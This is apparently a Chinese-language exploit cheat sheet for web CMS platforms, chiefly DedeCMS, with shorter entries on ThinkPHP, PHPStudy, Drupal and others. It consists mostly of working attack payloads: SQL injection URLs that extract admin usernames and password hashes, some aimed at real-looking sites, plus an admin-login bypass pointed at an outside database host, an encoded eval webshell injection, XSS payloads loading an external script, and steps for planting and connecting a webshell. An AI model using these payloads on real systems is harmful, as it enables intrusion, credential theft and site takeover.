PHPStudy
WebShell后门 'accept-charset': 'ZWNobyBzeXN0ZW0od2hvYW1pKTsK', 'Accept-Encoding':'gzip,deflate'
ThinkPHP
RCE Thinkphp 5.1.0 - 5.1.31 Thinkphp 5.0.5 - 5.0.23
SQL注入
ThinkPHP < 5.1.23
CVE-2018-16385
POC:
http://127.0.0.1/tp5.1/public/index/test/index?order[id`,111)|updatexml(1,concat(0x3a,user()),1)%23][]=1
http://127.0.0.1/tp5.1/public/index/test/index?order[id`,'aaa')| updatexml(1,concat(0x3a,user()),1)%23][]=1
Thinkphp <= 3.2.3
路径遍历
thinkphp3.0
可执行命令
查看版本
http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
查看phpinfo信息
http://webshell.cc/index.php/module/action/param1/$%7B@print(phpinfo())%7D
不可执行命令
爆路径
http://webshell.cc/appscn/index.php/module/action/param1/$%7B@print(phpinfo())%7
http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7
http://webshell.cc/index.php/module/action/module/param1/$%7B@print(THINK_VERSION)%7D
ZZZCMS
CVE-2019-9041 DisCuz ML v3.x cookie注入-远程代码执行 yUrO_2132_saltkey=S6RnGn2l; yUrO_3132_language=en'.1.';
Drupal
cve-2014-3704
Drupal 7.31 SQL注入
cve-2018-7600 RCE
ZCMS
zcms 2.x 后台投稿处 存储型XSS和CSRF漏洞 ZCMS(JSP) V1.1 登陆绕过&SQL注入&跨站漏洞
74CMS
SQL注入 74cms 逻辑漏洞导致sql注入 74cms_v3.4.20140410逻辑漏洞导致sql注入
74cms V3.4.20140530 逻辑漏洞导致二次sql注入变为普通sql注入
74CMS 20150423逻辑设计缺陷导致的注入、逻辑漏洞
maccms8
设计逻辑缺陷 -》 导致sql注入
mao10cms
逻辑漏洞可添加超级管理员
siteserver cms
密码找回处漏洞 http://vote.xx.cn/siteserver/forgetPassword.aspx 关闭js 输入用户名:admin 然后一直下一步 然后登陆后台,模板添加一句话,菜刀连接
aspcms
后台地址泄露
phpwind
v9.0.1 RCE
JeeCMS(Java)
Struts2 RCE
ESPCMS
二次注入(反序列化注入)
Joomla
反序列化(版本低于3.4.5)
Dedecms
工具: 鬼哥(旁注)C段利器 v1.5 www.90sec.org DedeCms recommend.php注入利用工具-p2j.cn DEDECMS FLINK(By:MEIAM) dedecms v5.3-v5.6 Get Shell 文件上传导致任意代码执行 绕过验证进入后台 http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root dcug改为当前的验证码,即可直接进入网站后台 前提是得到后台路径 敏感信息泄露 http://www.dedecms.com/plus/search.php?keyword=xxxx&channeltype=-0&orderby=&kwtype=-1&pagesize=10&typeid=0&TotalResult=-336&PageNo=%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3EFuck%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C&plistgo=%C7%E7%CC%EC%D0%A1%D6%FD? Google Hack - inurl:backupdata*dede_amin dedecms官方网站管理员账号密码泄露 http://www.dedecms.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 SQL注入 在magic_quotes_gpc=off时,攻击者可以将恶意SQL语句带入SQL执行,导致dedecms的审核机制被绕过 member/reg_new.php的代码 $sex变量在表单是单选,没做任何过滤 某文件没过滤直接带入sql查询,攻击者在magic_quotes_gpc=off时,可以注射SQL代码,绕过sqlids检测,执行sql语句. 要求会员中心,注册用户登录,magic_quotes_gpc=off,以及php版本要求 由于对参数的变量未作初始化检测及使用了类反射的技巧导致 plus\feedback.php 中变量 $typeid 存在注入风险 http://help.xx.com//plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 32位MD5减去头5位,减去尾七位,20位MD5密码,前减3后减1,得到16位MD5 http://www.xx.xx.cn//plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6887 http://xx.net/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'or%20mid=@`\'`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 plus/bookfeedback.php $catid变量以及$typeid变量未初始化 /member/edit_baseinfo.php - $addupquery /plus/search.php http://xx/plus/search.php?typeid=1&keyword=test http://localhost/dede/plus/search.php?typeArr[1%201%3d2union%20select%20pwd%20from%20dede_admin]=11&kwtype=0&q=11 http://xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a http://xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a http://localhost/dede7/plus/feedback.php?action=send&aid=1&&comtype=comments&isconfirm=yes¬user=1&msg=stage1111&title=yy',1,1,1,0,0,0,'feedback',0,@@version),(9,1,'',' 当gpc为on时,line 243的$title被转义两次,进入数据库的时候变成 然后我们引用这条留言: http://localhost/dede7/plus/feedback.php?action=send&aid=1&&comtype=reply&isconfirm=yes¬user=1&msg=stage2222&fid=38 再次引用id 41的留言: include/shopcar.class.php --cookie http://www.xx.com///plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a http://xcb.xx.com//plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a http://help.xx.com//plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a http://d.xx.com//plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a http://test.xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a 收藏文章功能$title变量未过滤,造成二次注入。 利用步骤(以获取dede_admin.pwd字段的值为例): 1)注册会员,登录,发表文章,文章标题为 u',char(@`'`), (select pwd from dede_admin))# 获取aid。这里aid=108 /plus/view.php?aid=108 2) 提交请求: http://u.cn/DedeCMS/plus/stow.php?aid=108&type=001 3) 访问:http://u.cn/DedeCMS/member/mystow.php 点击刚才发布的文章的“推荐“链接,打开如下连接 http://u.cn/DedeCMS/plus/recommend.php?type=29a53fb3c3&aid=108 其中type=29a53fb3c3的 29a53fb3c3 为dede_admin.pwd字段的前10位 4) 后10位使用类似的步骤,不同的是发布的文章标题为: u',char(@`'`),substring((select pwd from dede_admin),11))# http://127.0.0.1/dede/member/buy_action.php?product=1' and @`'` and 1=1* and '1'='1 利用方法 注册用户并且登陆 完了打开http://127.0.0.1/dede/member/edit_baseinfo.php 然后随便写一下 输入验证码 打开BURP 抓包 点击提交 然后再BURP里修改newsafequestion 的值改成1',email=@`'`,uname=(select user()),email='sss 然后提交 之后再打开http://127.0.0.1/dede/member/edit_baseinfo.php 就可以看到自己的、用户名变成了注入之后的结果 打开 http://127.0.0.1/dede/member/flink_main.php# 在连接网址里面写入 http://sss2'),(8,1,@`'`),(8,(select user()),'33333 连接名称随意 这里的8 是我的用户ID 想要查看 必须得知道自己的用户id 这个so easy 查看cookie 里面有一个DedeUserID 我的就是DedeUserID=8 这个一看就知道自己的id什么 因为是update注入 并且用了>ExecuteNoneQuery 所以延时注入都不行 但是 可以通过一个判断来进行忙注 如果条件成功 那么mtypename='$name' 就会被update了 首先打开 http://127.0.0.1/dede/member/mtypes.php 添加一个分类 记住ID 和原来的分类名称 然后打开 http://127.0.0.1/dede/member/mtypes.php?dopost=save&mtypename[2' or @`'` AND 1%3D1 and (select 'r')%3D'r' and '1'%3D'1]=4 将其中的2改成你的分类ID 完了打开之后 在返回http://127.0.0.1/dede/member/mtypes.php 如果(select 'r')='r'的话 那么分类名称就被改成了4! 这样我们就能来判断是否满足条件了! 可以写一个中专程序 首先访问http://127.0.0.1/dede/member/mtypes.php?dopost=save&mtypename[2' or @`'` AND 1%3D1 and (select 'r')%3D'r' and '1'%3D'1]=4 然后再返回http://127.0.0.1/dede/member/mtypes.php 的内容 这样就可以用工具跑了 http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and @`'` and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 测试方法 打开http://127.0.0.1/dede/member/soft_add.php 添加软件 然后打开BURP抓包 讲picnum改成typeid2 然后参数写5',1,1,1,@`'`),('-1','7',user() , '3','1389688643', '1389688643', '8'),(1,2,' 就能看到注入结果了 利用方法http://127.0.0.1/dede/member/content_list.php?channelid=1 打开这里发布 文章标题写上 1111',1,2),(8,136,user(),1,2),(1,2,'3 其他随意 然后提交 完了之后查看一下文章的ID 在打开http://127.0.0.1/dede/plus/stow.php?aid=137&type=11%27 把137改成你的文章ID 测试方法127.0.0.1/dede/plus/guestbook.php? action=save&validate=scuf&msg=1&uname=1&img=111' 吧SCUF改成你自己的验证码 利用方法 先打开127.0.0.1/dede/member/myfriend_group.php随便添加一个 然后看源码里groupname[]中的值 因为没有返回 只能盲注 那么判断是否满足条件就看是否update了原来的数据 这样就easy 执行一下语句 127.0.0.1/dede/member/myfriend_group.php?dopost=save&groupname[3' or @`'` and (select 1)%3D1 and '1]=12222 如果(select 1)=1的话 那个groupname就会被改成12222 上面的3改成你的groupname的ID 测试方法 打开 127.0.0.1/dede/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','[email protected]','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree= 吧SLUM改成你的验证码 DedeCMS全版本通杀SQL注入(无任何限制) --/member/buy_action.php 发表文章处,post表单的mtypesid可以注入 /dedecmsnew/member/album_add.php 注入的代码: mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'', '','12333','','','1367930810','1367930810','4','image','test','3')#@`'`' http://www.gdjjs.zjut.edu.cn/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a Dedecms 会员中心注入漏洞 注册用户之后验证邮箱完了之后 打开 127.0.0.1/dedecms/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4 然后在http://127.0.0.1/dedecms/member/operation.php 就可以查看到返回信息 http://www.xx-xx.com/plus/flink.php? Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\ http://www.xx-xx.com/plus/flink.php? Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\ dedecms SQL盲注漏洞(可以直接update出密码) 需注册 | filter.inc.php里未做过滤 ROOT_PATH/member/pm.php的64行 -- $id变量可控 首先给自己留个言 访问留言对应的id的url可以看到这条留言 http://127.0.0.1/dede/member/pm.php?dopost=read&id=1 然后注入,获取数据库用户 http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and 1=@`'` or 2=(select if(substring((select user()),1,1) ='r',2,1)) -- -@`'` 错误 http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and 1=@`'` or 2=(select if(substring((select user()),1,1) ='X',2,1)) -- -@`'` 获取admin密码 正确 http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and 1=@`'` or 2=(select if(substring((SELECT pwd from dede_admin),1,1) ='f',2,1)) -- -@`'` 错误 http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and 1=@`'` or 2=(select if(substring((SELECT pwd from dede_admin),1,1) ='X',2,1)) -- -@`'` 漏洞测试 此处是一个盲注,为了测试方便,我们直接修复执行语句的文件,打印出执行的语句: echo $this->queryString."
"; http://localhost/member/buy_action.php? POST pid=1&product=card&a=b%26GLOBALS[cfg_dbprefix]=dede_member_operation where mid=9999 or @`'` or (ascii(substring((select pwd from dede_admin limit 0,1),1,1))=97)#%26product=@`'` 注意到 %26 即 & 测试: 添加上传软件 本地地址 http://www.hao123.com 其它乱填就行,添加成功后,再次进入修改界面 软件地址改为: http://www.hao123.com}x{/dede:link}{dede:a text'=x']=0;eval(chr(101).chr(118).chr(97).chr(108).chr(40).chr(34).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(59).chr(34).chr(41).chr(59));// }xxxx{/dede:a}{dede:link}xxx 注意,这里后面多了 xxx ,就是为了绕过这个正则补丁。 然后执行完全没有压力! 后来测试,在GPC OFF跟 ON下写入的地址有所区别,上面是在ON下写入的。 原因你们懂得。 在 filter.inc.php 中,你们不管 GPC ,全过滤了 addslashes。 而且对这样的$svar[$_k]直接返回错误的值 DedeCMS在注册时对用户名、电子邮箱等限制的很死,唯独对用户笔名没做限制,可填写单引号等,由此导致再次使用笔名入库时二次注入 /member/reg_new.php 约194行 用户笔名处存在注入 DedeCMS-V5.7-UTF8-SP1 sql二次注入 漏洞细节 注册会员,然后跳到商品发布处 DedeCMS-V5.7-UTF8-SP1 sql注入 漏洞细节 进入圈子话题,然后点击我要发帖 在内容出填写:',concat(char(@`'`),(SELECT user())))#,(1, 然后点击提交,发现后台监控,抓取到的sql语句为: INSERT INTO dede_group_posts(gid,tid,first,author,authorid,subject,dateline,message,useip) VALUES('4','11',1,'越界','5','testetstetste','1401949158','',concat(char(@`'`),(SELECT user())))#,(1,','10.65.100.235') 查看数据库,即可看到此语句正常执行: url:http://localhost/DedeCMS-V5.7-UTF8-SP1/uploads/plus/carbuyaction.php post_data:dopost=return&code=alipay&out_trade_no=M1T1RN1' or concat(char(@`'`),(SELECT user())))# DedeCMS-V5.7-UTF8-SP1 新绕过思路+sql注入+任意订单支付合集 url:http://xx.xx.dedecms.com/plus/carbuyaction.php post_data: dopost=return&code=alipay&out_trade_no=S-P0098RN0098' and char("'")=(SELECT user())#&total_fee=&sign=06f4c5710c9faa468a0628bab208d77d&trade_status=TRADE_FINISHED DedeCMS-V5.7-SP1(2014-07-25)sql注入+新绕过思路 注册用户,将一个商品加入购物车 http://dzb.xx.edu.cn/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23%22; http://222.xx.68.166/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(0x40776562736166657363616E40),5,6,7,8,9%20from%20`%23@__admin`%23') http://www.xx.cn//plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23%22; XSS v5.7 友情链接申请的网址填写没有进行过滤和限制 - javascript:alert(document.cookie) www.gd-linux.com/plus/guestbook.php?action=admin&job=editok&id=100&msg= /plus/guestbook.php /plus/guestbook.php?gotopagerank=&totalresult=1300&pageno=5 http://localhost/plus/feedback.php?action=send&aid=1&&comtype=comments&isconfirm=yes¬user=1&msg=stage1111&title= 注册会员登录-空间设置-空间公告-源码 忘记过滤 <img 标签了. Location: /uploads/images/swfupload/swfupload.swf 漏洞文件为:http://www.dedecms.com/images/swfupload/swfupload.swf 这个flash文件存在漏洞,此文件漏洞可参考:https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/ 构造XSS攻击 http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// /uploads/dede/catalog_do.php --XSS+CSRF DedeCMS-V5.7-UTF8-SP1 块存储型xss 可打管理员 getshell成功测试 注册账户,然后登陆: DedeCMS-V5.7-UTF8-SP1 变反射为持久xss 拿shell 上次提交了一个个人圈子的反射型xss,但是乌云没有理会我,一直到现在还没有审核,这次我重新在找一个,那么就利用这个,把反射型变成一个持久类型,然后拿后台shell 首先登陆用户,然后创建圈子 http://xx.xx.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3Ciframe%20src=//www.baidu.com%3E%3C/iframe%3E http://xx.xx.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3CSCRIPT%20SRC=//ha.ckers.org/xss.js%3E%3C/SCRIPT%3E 首先购买商品 邮件处 留言处 确认后就可以了 等待管理员进入后台维护 管理员一旦点击收货人的名字或者数量的详细就会触发XSS dedecms 全版本!xss跨站一枚! referer构造触发! $_SERVER['HTTP_REFERER'] 未过滤直接输出到js中!由于官方默认数据库均有一个投票记录 所以基本上都可以触发此xss $_SERVER['HTTP_REFERER']明显是不安全的 比如我在本地写一个文件test.html /uploads//plus/feedback.php?aid=1 title= exp: var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i
DISCUZ
https://www.discuz.1314study.com/f/614.html